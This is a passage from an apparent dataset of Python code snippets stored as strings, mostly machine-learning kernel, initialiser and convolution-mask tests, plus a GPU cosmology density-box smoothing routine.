device\"\n\tnp.save(parent_folder+\"/Boxes/deltax_z0.00_{0:d}_{1:.0f}Mpc.npy\".format(DIM, BOX_LEN), hbox_large)\n\t\n\tif True:\n\t\tprint \"loading kbox\"\n\t\thbox_large = np.load(parent_folder+\"/Boxes/deltak_z0.00_{0:d}_{1:.0f}Mpc.npy\".format(DIM, BOX_LEN))\n\tfor meta_z in xrange(META_GRID_SIZE):\n\t\tlargebox_pin = hbox_large[:, :, meta_z*N:(meta_z+1)*N].copy()\n\t\t#cuda.memcpy_htod_async(largebox_d, largebox_pin)\n\t\tlargebox_d = gpuarray.to_gpu_async(hbox_large[:, :, meta_z*N:(meta_z+1)*N].copy())\n\t\tHII_filter(largebox_d, DIM, np.int32(meta_z), ZERO, smoothR, block=block_size, grid=stitch_grid_size);\n\t\thbox_large[:, :, meta_z*N:(meta_z+1)*N] = largebox_d.get_async()\n\t#import IPython; IPython.embed()\n\tprint \"Executing FFT on host\"\n\t#hbox_large = hifft(hbox_large).astype(np.complex64).real\n\t#hbox_large = pyfftw.interfaces.numpy_fft.ifftn(hbox_large).real\n\thbox_large = fft_stitch(N, plan2d, plan1d, hbox_large, largebox_d).real\n\tprint \"Finished FFT on host\"\n\t#import IPython; IPython.embed()\n\n\t# for meta_x in xrange(META_GRID_SIZE):\n\t# \tfor meta_y in xrange(META_GRID_SIZE):\n\t# \t\tfor meta_z in xrange(META_GRID_SIZE):\n\t# \t\t\tlargebox_d = gpuarray.to_gpu(hbox_large[meta_x*N:(meta_x+1)*N, meta_y*N:(meta_y+1)*N, meta_z*N:(meta_z+1)*N])\n\t# \t\t\tHII_filter(largebox_d, N, np.int32(meta_x), np.int32(meta_y), np.int32(meta_z), ZERO, smoothR, block=block_size, grid=grid_size);\n\t# \t\t\thbox_large[meta_x*N:(meta_x+1)*N, meta_y*N:(meta_y+1)*N, meta_z*N:(meta_z+1)*N] = largebox_d.get()\n\t#plan = Plan(shape, dtype=np.complex64)\n\t#plan.execute(largebox_d, inverse=True) #FFT to real space of smoothed box\n\t#largebox_d /= VOLUME #divide by VOLUME if using fft (vs ifft)\n\n\n\t# This saves a large resolution deltax\n\n\t\n\tprint \"downsampling\"\n\tsmallbox_d = gpuarray.zeros((HII_DIM,HII_DIM,M), dtype=np.float32)\n\tfor meta_z in xrange(META_GRID_SIZE):\n\t\tlargebox_pin = hbox_large[:, :, meta_z*N:(meta_z+1)*N].copy()\n\t\tcuda.memcpy_dtoh_async(largecbox_pin, largebox_d)\n\t\t#largebox_d = gpuarray.to_gpu_async(hbox_large[:, :, meta_z*N:(meta_z+1)*N].copy())\n\t\tlargebox_d /= scale**3 #\n\t\tsubsample_kernel(largebox_d, smallbox_d, DIM, HII_DIM, PIXEL_FACTOR, block=block_size, grid=HII_stitch_grid_size) #subsample in real space\n\t\thbox_small[:, :, meta_z*M:(meta_z+1)*M] = smallbox_d.get_async()\n\tnp.save(parent_folder+\"/Boxes/smoothed_deltax_z0.00_{0:d}_{1:.0f}Mpc\".format(HII_DIM, BOX_LEN), hbox_small)\n\t#import IPython; IPython.embed()\n\n\n\t# To get velocities: reload the k-space box\n\thbox_large = np.load(parent_folder+\"/Boxes/deltak_z0.00_{0:d}_{1:.0f}Mpc.npy\".format(DIM, BOX_LEN))\n\thvbox_large = np.zeros((DIM, DIM, DIM), dtype=np.float32)\n\thvbox_small = np.zeros(HII_shape, dtype=np.float32)\n\tsmoothR = np.float32(L_FACTOR*BOX_LEN/HII_DIM)\n\tlargevbox_d = gpuarray.zeros((DIM,DIM,N), dtype=np.complex64)\n\tsmallvbox_d = gpuarray.zeros((HII_DIM, HII_DIM, M), dtype=np.float32)\n\tfor num, mode in enumerate(['x', 'y', 'z']):\n\t\tfor meta_z in xrange(META_GRID_SIZE):\n\t\t\tlargebox_d = gpuarray.to_gpu_async(hbox_large[:, :, meta_z*N:(meta_z+1)*N].copy())\n\t\t\t#largebox_d /= VOLUME #divide by VOLUME if using fft (vs ifft)\n\t\t\tvelocity_kernel(largebox_d, largevbox_d, DIM, np.int32(meta_z), np.int32(num), block=block_size, grid=stitch_grid_size)\n\t\t\tHII_filter(largevbox_d, DIM, ZERO, smoothR, block=block_size, grid=stitch_grid_size)\n\t\t\tprint hvbox_large.shape, largevbox_d.shape\n\t\t\thvbox_large[:, :, meta_z*N:(meta_z+1)*N] = largevbox_d.get_async()\n\t\thvbox_large = fft_stitch(N, plan2d, plan1d, hvbox_large, largevbox_d).real\n\t\tfor meta_z in xrange(META_GRID_SIZE):\n\t\t\tlargevbox_d = gpuarray.to_gpu_async(hvbox_large[:, :, meta_z*N:(meta_z+1)*N].copy())\n\t\t\tsubsample_kernel(largevbox_d.real, smallvbox_d, DIM, HII_DIM,PIXEL_FACTOR, block=block_size, grid=HII_stitch_grid_size)\n\t\t\thvbox_small[:, :, meta_z*M:(meta_z+1)*M] = smallvbox_d.get_async()\n\t\tnp.save(parent_folder+\"/Boxes/v{0}overddot_{1:d}_{2:.0f}Mpc\".format(mode, HII_DIM, BOX_LEN), smallvbox_d.get())\n\n\treturn", "def test_truncate2():\n X = rand(5,5,5)\n T = hosvd(X)\n k = 3\n Tk = T.truncate(k)\n E = X - Tk.asarray()\n Cdk = T.X\n Cdk[:k,:k,:k] = 0\n assert np.allclose(fro_norm(E), fro_norm(Cdk))", "def _initialize_kernel(input_dim: int,\n kernel: str = 'RBF',\n use_single_gp: bool = False) -> GenericKernel:\n if kernel == 'RBF':\n return RBFKernel(input_dim, use_single_gp)\n elif kernel == 'Matern52':\n return Matern52Kernel(input_dim, use_single_gp)\n elif kernel == 'Matern32':\n return Matern32Kernel(input_dim, use_single_gp)\n elif kernel == 'RationalQuadratic':\n return RationalQuadraticKernel(\n input_dim=input_dim, use_single_gp=use_single_gp)\n elif kernel == 'Sigmoid':\n return SigmoidKernel(input_dim, use_single_gp)\n else:\n sys.exit(\"Error: specified Gaussian Process kernel not valid\")", "def testMaskErrorIncompatibleRank1(self):\n\n np_mask = np.ones((3,))\n x = tf.constant(0.0, shape=(2, 8, 8, 6))\n\n # Test with both numpy arrays and Tensors.\n for mask in (np_mask, tf.convert_to_tensor(np_mask)):\n with self.assertRaises(snt.Error) as cm:\n snt.Conv2D(output_channels=4, kernel_shape=5, mask=mask)(x)\n self.assertTrue(str(cm.exception).startswith(\n \"Invalid mask shape: {}\".format(np_mask.shape)))", "def init_layer(layer):\n \n if layer.weight.ndimension() == 4:\n (n_out, n_in, height, width) = layer.weight.size()\n n = n_in * height * width\n \n elif layer.weight.ndimension() == 2:\n (n_out, n) = layer.weight.size()\n\n std = math.sqrt(2. / n)\n scale = std * math.sqrt(3.)\n layer.weight.data.uniform_(-scale, scale)\n\n if layer.bias is not None:\n layer.bias.data.fill_(0.)", "def _WeightInit(self, stddev):\n return init_ops.truncated_normal_initializer(stddev=stddev)", "def test_MKDADensity_kernel_instance(testdata_cbma):\n kern = MKDAKernel(r=5)\n meta = MKDADensity(kern, null_method=\"montecarlo\", n_iters=10)\n results = meta.fit(testdata_cbma)\n assert isinstance(results, nimare.results.MetaResult)", "def test_null_bootstrapping(self):\n\n apply = lambda p, x, i: x[:, :1]\n output = apply(self._params, self._batch.x, self._index)\n # y is zero, hence the loss is just the mean square of the output.\n expected_loss = np.mean(np.square(output))\n\n loss_fn = single_index.L2Loss()\n loss, unused_metrics = loss_fn(\n apply=apply, params=self._params, batch=self._batch, index=self._index)\n self.assertEqual(\n loss, expected_loss,\n (f'expected loss with null bootstrapping is {expected_loss}, '\n f'but it is {loss}'))", "def testMaskErrorIncompatibleRank2(self):\n\n np_mask = np.ones((3, 3))\n x = tf.constant(0.0, shape=(2, 8, 8, 6))\n\n # Test with both numpy arrays and Tensors.\n for mask in (np_mask, tf.convert_to_tensor(np_mask)):\n with self.assertRaises(snt.Error) as cm:\n snt.Conv2D(output_channels=4, kernel_shape=5, mask=mask)(x)\n self.assertTrue(str(cm.exception).startswith(\n \"Invalid mask shape: {}\".format(np_mask.shape)))", "def test_init_with_width_less_or_equal_0(self):\n with self.assertRaisesRegex(ValueError, \"width must be > 0\"):\n Square(0, 1)\n with self.assertRaisesRegex(ValueError, \"width must be > 0\"):\n Square(-1, 1)", "def check_kernel(cls):\n pass", "def __init__(self, ksize_low, ksize_high=None): \n self._sigma_low = 0.3*(ksize_low//2 - 1) + 0.8\n \n if ksize_high is None:\n self._sigma_high = np.sqrt(2)*self._sigma_low\n else:\n self._sigma_high = 0.3*(ksize_high//2 - 1) + 0.8", "def __init__(self, kernel_size, *args, **kwargs):\n super().__init__()\n self.kernel_size = kernel_size", "def __init__(self, kernel_size, *args, **kwargs):\n super().__init__()\n self.kernel_size = kernel_size", "def testMaskErrorIncompatibleRank1(self):\n\n np_mask = np.ones((3,))\n x = tf.constant(0.0, shape=(2, 8, 6))\n\n # Test with both numpy arrays and Tensors.\n for mask in (np_mask, tf.convert_to_tensor(np_mask)):\n with self.assertRaises(snt.Error) as cm:\n snt.Conv1D(output_channels=4, kernel_shape=5, mask=mask)(x)\n self.assertTrue(str(cm.exception).startswith(\n \"Invalid mask shape: {}\".format(np_mask.shape)))", "def test_unroll_kern(self):\r\n # 6 filters is a multiple of 2 and 3. Should work.\r\n self.validate((2, 3, 3, 3), (6, 3, 2, 2), 'valid', unroll_kern=2,\r\n verify_grad=False)\r\n self.validate((2, 3, 3, 3), (6, 3, 2, 2), 'valid', unroll_kern=3,\r\n verify_grad=False)", "def test__get_kernel_size_numel_raise_value_error(kernel_size):\n with pytest.raises(ValueError):\n utils._get_kernel_size_numel(kernel_size)", "def testMask1D(self):\n mask = np.ones((3,), dtype=np.float32)\n inputs = tf.constant(1.0, shape=(1, 5, 5, 2))\n conv1 = snt.Conv2D(\n output_channels=1,\n kernel_shape=3,\n mask=mask,\n padding=snt.VALID,\n use_bias=False,\n initializers=create_constant_initializers(1.0, 0.0, use_bias=False))\n out = conv1(inputs)\n expected_out = 18 * np.ones((1, 3, 3, 1))\n with self.test_session():\n tf.variables_initializer([conv1.w]).run()\n self.assertAllClose(out.eval(), expected_out)", "def test_inputscaling(self):\n esn = ESN(N_in,N_out,input_scaling=2)\n self.assertTrue(np.all(2*self.X == esn._scale_inputs(self.X)))\n esn.fit(self.X,self.y)\n esn.predict(self.Xp)\n\n esn = ESN(N_in,N_out,input_scaling=[2]*N_in)\n self.assertTrue(np.all(2*self.X == esn._scale_inputs(self.X)))\n esn.fit(self.X,self.y)\n esn.predict(self.Xp)\n\n esn = ESN(N_in,N_out,input_scaling=np.array([2]*N_in))\n self.assertTrue(np.all(2*self.X == esn._scale_inputs(self.X)))\n esn.fit(self.X,self.y)\n esn.predict(self.Xp)\n\n with self.assertRaises(ValueError):\n esn = ESN(N_in,N_out,input_scaling=[2]*(N_in+1))\n\n with self.assertRaises(ValueError):\n esn = ESN(N_in,N_out,input_scaling=np.array([[2]*N_in]))", "def __init__(self, ksize: torch.Tensor = 7, sigma: torch.Tensor = 5):\r\n super().__init__()\r\n self.ksize = ksize\r\n self.sigma = sigma\r\n\r\n self.conv2d_guass = get_gaussian_kernel(self.ksize, self.sigma)", "def test_normalize_zero_length_vector(self):\n\n v = Vector({ 'x': 0 })\n v.normalize()\n self.assertEqual({ 'x': 0 }, v.dimensions)", "def initialize_(self, kernel, bias=None):\n dtype = self.body[0].weight.dtype\n device = self.body[0].weight.device\n kernel = torch.tensor(kernel, dtype=dtype, device=device, requires_grad=True)\n assert kernel.shape == self.body[0].weight.shape, 'Wrong kernel shape!'\n if bias is not None:\n bias = torch.tensor(bias, dtype=dtype, device=device, requires_grad=True)\n assert bias.shape == self.body[0].bias.shape, 'Wrong bias shape!'\n self.body[0].weight.data.copy_(kernel)\n self.body[0].bias.data.copy_(bias)", "def test_bootstrap_array_invalid_axis():\n test_array = np.zeros((3, 4))\n test_axis = 2\n nboot = 5\n pytest.raises(\n ValueError, utils.bootstrap_array, test_array, nboot=nboot, axis=test_axis\n )", "def test_gpu():\n vectorizer = Vectorizer(device=\"gpu\", engine=\"cuml\")\n pytest.raises(ValueError, vectorizer.fit_transform, X_text)", "def test__get_conv_raise_dimension_error(N):\n with pytest.raises(ValueError):\n utils._get_conv(N)", "def set_kernel_reg(model, lambdal1 = 0, lambdal2 = 0):\r\n\r\n\r\n\tfor layer in model.layers:\r\n\t\tif hasattr(layer, 'kernel_regularizer'):\r\n\t\t\tlayer.kernel_regularizer = l1_l2(l1 = lambdal1, l2 = lambdal2)\r\n\r\n\treturn model", "def test_MKDADensity_kernel_class(testdata_cbma):\n meta = MKDADensity(MKDAKernel, kernel__r=5, null_method=\"montecarlo\", n_iters=10)\n results = meta.fit(testdata_cbma)\n assert isinstance(results, nimare.results.MetaResult)", "def testMask2D(self):\n mask = np.ones((3, 2), dtype=np.float32)\n inputs = tf.constant(1.0, shape=(1, 5, 2))\n conv1 = snt.Conv1D(\n output_channels=1,\n kernel_shape=3,\n mask=mask,\n padding=snt.VALID,\n use_bias=False,\n initializers=create_constant_initializers(1.0, 0.0, use_bias=False))\n out = conv1(inputs)\n expected_out = np.reshape(np.array([6, 6, 6]), (1, 3, 1))\n with self.test_session():\n tf.variables_initializer([conv1.w]).run()\n self.assertAllClose(out.eval(), expected_out)", "def __init__(self,\n min_level,\n max_level,\n classes=80,\n boxes_per_level=3,\n output_extras=0,\n norm_momentum=0.99,\n norm_epsilon=0.001,\n kernel_initializer=\"VarianceScaling\",\n subdivisions=8,\n kernel_regularizer=None,\n bias_regularizer=None,\n activation=None,\n smart_bias=False,\n **kwargs):\n\n super().__init__(**kwargs)\n self._min_level = min_level\n self._max_level = max_level\n\n self._key_list = [\n str(key) for key in range(self._min_level, self._max_level + 1)\n ]\n\n self._classes = classes\n self._boxes_per_level = boxes_per_level\n self._output_extras = output_extras\n\n self._output_conv = (classes + output_extras + 5) * boxes_per_level\n self._smart_bias = smart_bias\n\n self._base_config = dict(\n activation=activation,\n subdivisions=subdivisions,\n norm_momentum=norm_momentum,\n norm_epsilon=norm_epsilon,\n kernel_initializer=kernel_initializer,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer)\n\n self._conv_config = dict(\n filters=self._output_conv,\n kernel_size=(1, 1),\n strides=(1, 1),\n padding=\"same\",\n use_bn=False,\n **self._base_config)", "def testInvalidNumberOfClasses(self):\n\n feature = layers.real_valued_column('feature')\n with self.assertRaises(ValueError):\n _ = kernel_estimators.KernelLinearClassifier(\n feature_columns=[feature], n_classes=1)", "def testRaisesErrorWhenNoSampleMask(self):\n t = CoalescenceTree(self.coal)\n with self.assertRaises(ValueError):\n t.set_speciation_parameters(\n speciation_rates=[0.5, 0.7], record_spatial=\"T\", record_fragments=\"T\", sample_file=\"null\"\n )", "def _initialize(shape, dtype, batch_ndims, scale, mode, distribution,\n seed=None):\n if not dtype_util.is_floating(dtype):\n raise TypeError('Argument `dtype` must be float type (saw: \"{}\").'.format(\n dtype))\n shape = prefer_static.reshape(shape, shape=[-1]) # Ensure shape is vector.\n fan_in, fan_out = _compute_fans_from_shape(shape, batch_ndims)\n fans = _summarize_fans(fan_in, fan_out, mode, dtype)\n scale = prefer_static.cast(scale, dtype)\n return _sample_distribution(shape, scale / fans, distribution, seed, dtype)", "def __init__(self, kernel_parameter: Union[int, float] = 1, nu=1.5):\n super().__init__(kernel_parameter)\n self.nu = nu", "def test_regularization_0size_interval(self):\n reg = modelgen.get_regularization(2, 2)\n assert reg == 0.01", "def test_matern12_zero_variance(matern):\n with pytest.raises(ValueError) as exp:\n matern(lengthscale=1.0, variance=0.0, output_dim=1)\n assert exp.value.args[0].find(\"variance must be positive.\") >= 0", "def __init__(self):\n kernel=numpy.array([[-1, -1, -1],\n [-1, 9, -1],\n [-1, -1, -1]])\n VConvolutionFilter.__init__(self,kernel)", "def testInputTypeError(self, use_bias):\n conv1 = snt.SeparableConv2D(\n output_channels=3,\n channel_multiplier=1,\n kernel_shape=3,\n padding=snt.SAME,\n use_bias=use_bias,\n initializers=create_separable_constant_initializers(\n 1.0, 1.0, 1.0, use_bias))\n\n for dtype in (tf.uint32, tf.float64):\n x = tf.constant(np.ones([1, 5, 5, 1]), dtype=dtype)\n err = \"Input must have dtype tf.float.*\"\n with self.assertRaisesRegexp(TypeError, err):\n conv1(x)", "def test_init_variants():\n # get data\n X, _, _, _ = get_data()\n # set seed and kernel initialisers for repeatability\n tf.random.set_seed(12345)\n initializer = tf.keras.initializers.Zeros()\n\n # define model architecture\n input_data = Input(shape=X[0].shape)\n xx = Dense(32, activation=\"relu\", kernel_initializer=initializer)(input_data)\n output = Dense(n_classes, activation=\"softmax\", kernel_initializer=initializer)(xx)\n\n # standard way\n model = SafeKerasModel(\n inputs=input_data,\n outputs=output,\n name=\"test\",\n num_samples=X.shape[0],\n epochs=EPOCHS,\n )\n check_init_completed(model)\n\n # inputs and outputs not in kwargs\n model2 = SafeKerasModel(\n input_data,\n output,\n \"test\",\n num_samples=X.shape[0],\n epochs=EPOCHS,\n )\n check_init_completed(model2)\n\n # batch size zero\n model3 = SafeKerasModel(\n inputs=input_data,\n outputs=output,\n name=\"test\",\n num_samples=X.shape[0],\n epochs=EPOCHS,\n batch_size=0,\n )\n errstr = \"failed to correct batch_size=0 in init\"\n assert model3.batch_size == 32, errstr", "def test_bad_bounds(self):\n with pytest.raises(ValueError):\n Real(\"yolo\", \"norm\", 0, 2, low=+2, high=-2, shape=(4, 4))\n with pytest.raises(ValueError):\n Real(\"yolo\", \"norm\", 0, 2, low=+2, high=+2, shape=(4, 4))", "def test_multitensor_init():\n a = np.random.random((5, 5))\n b = np.random.random((4, 4))\n c = np.random.random((3, 3))\n at = Tensor(tensor=a, name='a')\n bt = Tensor(tensor=b, name='b')\n ct = Tensor(tensor=c, name='c')\n mt = MultiTensor([at, bt, ct])\n\n with pytest.raises(TypeError):\n _ = MultiTensor((at, bt))\n\n assert len(mt.dual_basis) == 0\n\n assert np.isclose(mt.vec_dim, 5**2 + 4**2 + 3**2)", "def test_initialize_InitRiseVelFromDist_normal():\n num_elems = 1000\n data_arrays = mock_append_data_arrays(rise_vel_array, num_elems)\n\n dist = NormalDistribution(mean=0, sigma=0.1)\n fcn = InitRiseVelFromDist(distribution=dist)\n fcn.initialize(num_elems, None, data_arrays)\n\n assert_dataarray_shape_size(rise_vel_array, data_arrays, num_elems)\n\n assert np.all(0 != data_arrays['rise_vel'])", "def matern_kernel(x_1, x_2, l, v):\n\n\tassert l > 0 and v > 0, \"The hyperparameters l and v must be > 0\"\n\tdist = euclidean_distances(x_1.reshape(-1,1), x_2.reshape(-1,1))\n\tdist[dist == 0.0] += 1e-10\n\tz = np.sqrt(2*v) * dist / l\n\treturn (2**(1-v)/gamma(v)) * (z**v) * kv(v, z)", "def __init__(self, **kwargs):\n super(VitisGlobalAveragePooling2D, self).__init__(**kwargs)\n self.rescale_factor = None", "def batchnorm_init(m, kernelsize=3):\r\n n = kernelsize**2 * m.num_features\r\n m.weight.data.normal_(0, math.sqrt(2. / (n)))\r\n m.bias.data.zero_()", "def testMaskErrorIfIncorrectDtype(self):\n\n mask = tf.constant(0, shape=(4, 4), dtype=tf.int32)\n x = tf.constant(0.0, shape=(2, 8, 8, 6))\n\n with self.assertRaises(TypeError) as cm:\n snt.Conv2D(output_channels=4, kernel_shape=(4, 4), mask=mask)(x)\n self.assertTrue(str(cm.exception).startswith(\n \"Mask needs to have dtype float16, float32 or float64\"))", "def test_normalize(dummy_input):\n # Test the 2D image: H, W, C\n image, label = dummy_input(image_size=(512, 512, 3),\n label_size=(512, 512, 1))\n transform = Normalize(means=None, stds=None)\n _image, _label = transform(image, label, normalize_tags=[True, False])\n assert not (image == _image).all()\n assert (label == _label).all()\n\n # Test the 3D image: H, W, D, C\n image, label = dummy_input(image_size=(512, 512, 20, 3),\n label_size=(512, 512, 20, 1))\n transform = Normalize(means=None, stds=None)\n _image, _label = transform(image, label, normalize_tags=[True, False])\n assert not (image == _image).all()\n assert (label == _label).all()\n assert np.abs(np.mean(_image)-0) < 1e-8\n assert np.abs(np.std(_image)-1) < 1e-8", "def __init__(self):\n kernel=numpy.array([[-1, -1, -1],\n [-1, 8, -1],\n [-1, -1, -1]])\n VConvolutionFilter.__init__(self,kernel)", "def __init__(self, in_channels, out_channels=None, kernel_size=None, stride=1, dilation=1, groups=1,\n rd_ratio=1./16, rd_channels=None, rd_divisor=8, keep_3x3=True, split_input=True,\n act_layer=nn.ReLU, norm_layer=nn.BatchNorm2d, aa_layer=None, drop_layer=None):\n super(SelectiveKernel, self).__init__()\n out_channels = out_channels or in_channels\n kernel_size = kernel_size or [3, 5] # default to one 3x3 and one 5x5 branch. 5x5 -> 3x3 + dilation\n _kernel_valid(kernel_size)\n if not isinstance(kernel_size, list):\n kernel_size = [kernel_size] * 2\n if keep_3x3:\n dilation = [dilation * (k - 1) // 2 for k in kernel_size]\n kernel_size = [3] * len(kernel_size)\n else:\n dilation = [dilation] * len(kernel_size)\n self.num_paths = len(kernel_size)\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.split_input = split_input\n if self.split_input:\n assert in_channels % self.num_paths == 0\n in_channels = in_channels // self.num_paths\n groups = min(out_channels, groups)\n\n conv_kwargs = dict(\n stride=stride, groups=groups, act_layer=act_layer, norm_layer=norm_layer,\n aa_layer=aa_layer, drop_layer=drop_layer)\n self.paths = nn.ModuleList([\n ConvNormActAa(in_channels, out_channels, kernel_size=k, dilation=d, **conv_kwargs)\n for k, d in zip(kernel_size, dilation)])\n\n attn_channels = rd_channels or make_divisible(out_channels * rd_ratio, divisor=rd_divisor)\n self.attn = SelectiveKernelAttn(out_channels, self.num_paths, attn_channels)", "def scaled_init_method_normal(sigma, num_layers):\n std = sigma / math.sqrt(2.0 * num_layers)\n\n def init_(tensor):\n return torch.nn.init.normal_(tensor, mean=0.0, std=std)\n\n return init_", "def scaled_init_method_normal(sigma, num_layers):\n std = sigma / math.sqrt(2.0 * num_layers)\n\n def init_(tensor):\n return torch.nn.init.normal_(tensor, mean=0.0, std=std)\n\n return init_", "def testMulRealConstDepthAcceptance(self):\n self.assertRaises(MambaError, mulRealConst, self.im1_1, 1.0, self.im8_2)\n self.assertRaises(MambaError, mulRealConst, self.im32_1, 1.0, self.im1_2)", "def testKernelShape(self, out_channels, padding, use_bias, in_shape,\n out_shape, stride_shape, use_output_shape):\n snt.Conv1DTranspose(\n output_channels=out_channels,\n output_shape=out_shape if use_output_shape else None,\n kernel_shape=[3],\n padding=padding,\n stride=stride_shape,\n name=\"conv1\",\n use_bias=use_bias)\n snt.Conv1DTranspose(\n output_channels=out_channels,\n output_shape=out_shape if use_output_shape else None,\n kernel_shape=3,\n padding=padding,\n stride=stride_shape,\n name=\"conv1\",\n use_bias=use_bias)\n\n err = \"Invalid kernel\"\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, err):\n snt.Conv1DTranspose(output_channels=out_channels,\n output_shape=out_shape if use_output_shape else None,\n kernel_shape=[3, 3],\n name=\"conv1\",\n use_bias=use_bias)\n\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, err):\n snt.Conv1DTranspose(output_channels=out_channels,\n output_shape=out_shape if use_output_shape else None,\n kernel_shape=[3, 3, 3, 3],\n name=\"conv1\",\n use_bias=use_bias)", "def test_mie_length(self):\n kr = np.array([1, 2])\n lmin = 5\n lmax = 10\n x, y = bessel_sk.mie_bessels(kr, lmin, lmax)\n self.assertEqual(x.shape, (len(kr), lmax-lmin+1))\n self.assertEqual(y.shape, (len(kr), lmax-lmin+1))", "def test_input_dimension(self):\n knn = Knn(n_neighbors=3)\n with self.assertRaises(ValueError): knn.fit(X_train, y_test)", "def __init__(self):\n kernel=numpy.array([[-2, -1, 0],\n [-1, 1, 1],\n [0, 1, 2]])\n VConvolutionFilter.__init__(self,kernel)", "def __init__(self, *args):\n _hypre.HypreDiagScale_swiginit(self, _hypre.new_HypreDiagScale(*args))", "def testInitializers(self, use_bias):\n\n w_dw = random.random()\n w_pw = random.random()\n b = np.random.randn(6) # Kernel shape is 3, input channels are 2, 2*3 = 6.\n conv1 = snt.SeparableConv2D(\n output_channels=6,\n channel_multiplier=3,\n kernel_shape=3,\n use_bias=use_bias,\n initializers=create_separable_constant_initializers(\n w_dw, w_pw, b, use_bias))\n\n conv1(tf.placeholder(tf.float32, [1, 10, 10, 2]))\n\n with self.test_session():\n tf.variables_initializer(\n [conv1.w_dw, conv1.w_pw, conv1.b] if use_bias else\n [conv1.w_dw, conv1.w_pw]).run()\n\n self.assertAllClose(\n conv1.w_dw.eval(), np.full(\n [3, 3, 2, 3], w_dw, dtype=np.float32))\n self.assertAllClose(\n conv1.w_pw.eval(), np.full(\n [1, 1, 6, 6], w_pw, dtype=np.float32))\n\n if use_bias:\n self.assertAllClose(conv1.b.eval(), b)\n\n error_msg = \"Initializer for 'w_dw' is not a callable function\"\n with self.assertRaisesRegexp(TypeError, error_msg):\n snt.SeparableConv2D(\n output_channels=3,\n channel_multiplier=1,\n kernel_shape=3,\n stride=1,\n use_bias=use_bias,\n initializers={\"w_dw\": tf.ones([])})", "def kernel_for_string(name: str, lengthscale: float = 1.) -> GPy.kern.Kern:\n variance = .3 ** 2\n if name == 'RBF':\n return GPy.kern.RBF(input_dim=1, lengthscale=lengthscale)\n if name == 'Exponential':\n return GPy.kern.Exponential(input_dim=1, lengthscale=lengthscale)\n if name == 'Matern32':\n return GPy.kern.Matern32(input_dim=1, lengthscale=lengthscale)\n if name == 'Matern52':\n return GPy.kern.Matern52(input_dim=1, lengthscale=lengthscale)\n if name == 'PeriodicExponential':\n return GPy.kern.PeriodicExponential(input_dim=1, period=2. * np.pi, lengthscale=lengthscale, variance=variance)\n if name == 'PeriodicMatern32':\n return GPy.kern.PeriodicMatern32(input_dim=1, period=2. * np.pi, lengthscale=lengthscale, variance=variance)\n if name == 'PeriodicMatern52':\n return GPy.kern.PeriodicMatern52(input_dim=1, period=2. * np.pi, lengthscale=lengthscale)\n if name == 'StdPeriodic':\n return GPy.kern.StdPeriodic(input_dim=1, period=2. * np.pi, lengthscale=lengthscale)\n if name == 'Brownian':\n return GPy.kern.Brownian(input_dim=1)\n if name == 'ExpQuad':\n return GPy.kern.ExpQuad(input_dim=1, lengthscale=lengthscale)\n if name == 'OU':\n return GPy.kern.OU(input_dim=1, lengthscale=lengthscale)\n if name == 'RatQuad':\n return GPy.kern.RatQuad(input_dim=1, lengthscale=lengthscale)\n if name == 'White':\n return GPy.kern.White(input_dim=1)\n if name == 'MLP':\n return GPy.kern.MLP(input_dim=1) # has other parameters\n if name == 'Spline':\n return GPy.kern.Spline(input_dim=1)\n if name == 'Poly':\n return GPy.kern.Poly(input_dim=1) # has other parameters\n\n raise LookupError()", "def testBiasInitializerIsZeroByDefault(self):\n\n conv1 = snt.Conv3D(\n output_channels=5,\n kernel_shape=3,\n stride=1)\n\n conv1(tf.placeholder(tf.float32, [5, 10, 10, 10, 7]))\n\n with self.test_session():\n tf.variables_initializer([conv1.w, conv1.b]).run()\n\n self.assertAllClose(\n conv1.b.eval(),\n np.zeros([5], dtype=np.float32))", "def testVariablesWithAndWithoutKernels(self):\n multi_dim_feature = layers.real_valued_column(\n 'multi_dim_feature', dimension=2)\n\n linear_classifier = kernel_estimators.KernelLinearClassifier(\n feature_columns=[multi_dim_feature])\n linear_classifier.fit(\n input_fn=_linearly_inseparable_binary_input_fn, steps=50)\n linear_variables = linear_classifier.get_variable_names()\n self.assertIn('linear/multi_dim_feature/weight', linear_variables)\n self.assertIn('linear/bias_weight', linear_variables)\n linear_weights = linear_classifier.get_variable_value(\n 'linear/multi_dim_feature/weight')\n linear_bias = linear_classifier.get_variable_value('linear/bias_weight')\n\n kernel_mappers = {\n multi_dim_feature: [RandomFourierFeatureMapper(2, 30, 0.6, 1, 'rffm')]\n }\n kernel_linear_classifier = kernel_estimators.KernelLinearClassifier(\n feature_columns=[], kernel_mappers=kernel_mappers)\n kernel_linear_classifier.fit(\n input_fn=_linearly_inseparable_binary_input_fn, steps=50)\n kernel_linear_variables = kernel_linear_classifier.get_variable_names()\n self.assertIn('linear/multi_dim_feature_MAPPED/weight',\n kernel_linear_variables)\n self.assertIn('linear/bias_weight', kernel_linear_variables)\n kernel_linear_weights = kernel_linear_classifier.get_variable_value(\n 'linear/multi_dim_feature_MAPPED/weight')\n kernel_linear_bias = kernel_linear_classifier.get_variable_value(\n 'linear/bias_weight')\n\n # The feature column used for linear classification (no kernels) has\n # dimension 2 so the model will learn a 2-dimension weights vector (and a\n # scalar for the bias). In the kernelized model, the features are mapped to\n # a 30-dimensional feature space and so the weights variable will also have\n # dimension 30.\n self.assertEqual(2, len(linear_weights))\n self.assertEqual(1, len(linear_bias))\n self.assertEqual(30, len(kernel_linear_weights))\n self.assertEqual(1, len(kernel_linear_bias))", "def testMaskErrorIfIncorrectDtype(self):\n\n mask = tf.constant(0, shape=(4, 4), dtype=tf.int32)\n x = tf.constant(0.0, shape=(2, 8, 6))\n\n with self.assertRaises(TypeError) as cm:\n snt.Conv1D(output_channels=4, kernel_shape=4, mask=mask)(x)\n self.assertTrue(str(cm.exception).startswith(\n \"Mask needs to have dtype float16, float32 or float64\"))", "def __init__(self):\n kernel=numpy.array([[0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4]])\n VConvolutionFilter.__init__(self,kernel)", "def test_wrong_length(self):\n with self.assertRaises(ValueError):\n calc_disc_b(np.ones(10), np.ones(10), np.ones(5), 0.3)", "def test_0size(self):\n Square.reset_objects()\n with self.assertRaises(ValueError) as e:\n s1 = Square(0)\n self.assertEqual(str(e.exception), 